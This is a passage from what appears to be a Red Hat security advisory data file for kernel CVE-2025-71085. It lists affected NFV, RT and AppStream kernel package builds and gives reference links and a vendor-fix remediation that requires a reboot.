"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "RHBZ#2429026",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429026"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-71085",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71085"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/T"
}
],
"release_date": "2026-01-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
